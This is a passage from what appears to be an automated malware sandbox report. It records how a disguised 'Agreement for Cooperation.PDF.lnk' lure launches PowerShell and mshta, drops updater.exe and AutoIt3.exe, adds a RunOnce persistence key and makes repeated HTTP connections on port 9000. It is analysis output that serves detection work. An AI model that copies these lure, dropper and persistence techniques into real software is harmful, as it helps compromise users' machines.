                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_013370C9 push 013370FDh; ret 11_2_013370F5
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0134133D push 01341369h; ret 11_2_01341361
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0134133B push 01341369h; ret 11_2_01341361
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133D325 push 0133D351h; ret 11_2_0133D349
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0134137D push 013413A9h; ret 11_2_013413A1
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0134137B push 013413A9h; ret 11_2_013413A1
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133D389 push 0133D3D6h; ret 11_2_0133D3CE
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133D388 push 0133D3D6h; ret 11_2_0133D3CE
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133D211 push 0133D2B9h; ret 11_2_0133D2B1
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01346275 push 013462A9h; ret 11_2_013462A1
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0134627D push 013462A9h; ret 11_2_013462A1
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133D2BB push 0133D351h; ret 11_2_0133D349
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_013462CC push 01346310h; ret 11_2_01346308
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_013462CD push 01346310h; ret 11_2_01346308

                    Persistence and Installation Behavior

                    barindex
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\47891652\updater.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeFile created: C:\ahdccea\AutoIt3.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhcJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhcJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: Possible double extension: pdf.lnkStatic PE information: Agreement for Cooperation.PDF.lnk.download.lnk
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49800
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49833
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49840
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49846
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49852
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49853
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49865
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49871
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49883
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49890
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49896
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49901
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49903
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49909
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49914
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49916
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49923
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49928
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49932
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49936
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49947
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49949
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49955
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49960
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49962
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49968
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49975
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49980
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49986
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49988
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49993
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50001
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50007
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50012
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50014
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50019
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50030
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50032
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50039
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50044
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50046
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50052
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50057
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50059
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50061
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50063
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50064
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50065
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50066
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50067
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50068
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50071
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50073
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50074
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50075
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50076
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50078
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50079
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50082
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50084
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50086
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50088
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50089
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50092
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50093
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50094
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50095
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50096
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50098
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50099
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50101
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50102
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50103
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50105
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50107
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50108
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50109
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50110
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50111
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50112
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50113
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50114
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50115
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50116
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50118
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50119
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50121
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50122
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50124
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50125
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50126
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50127
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50130
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50131
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50132
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50133
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50136
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50137
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50138
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50139
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50140
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50141
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50142
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_004E59B3
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00475EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00475EDA
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_00A059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,14_2_00A059B3
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_00995EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00995EDA
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004833B7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
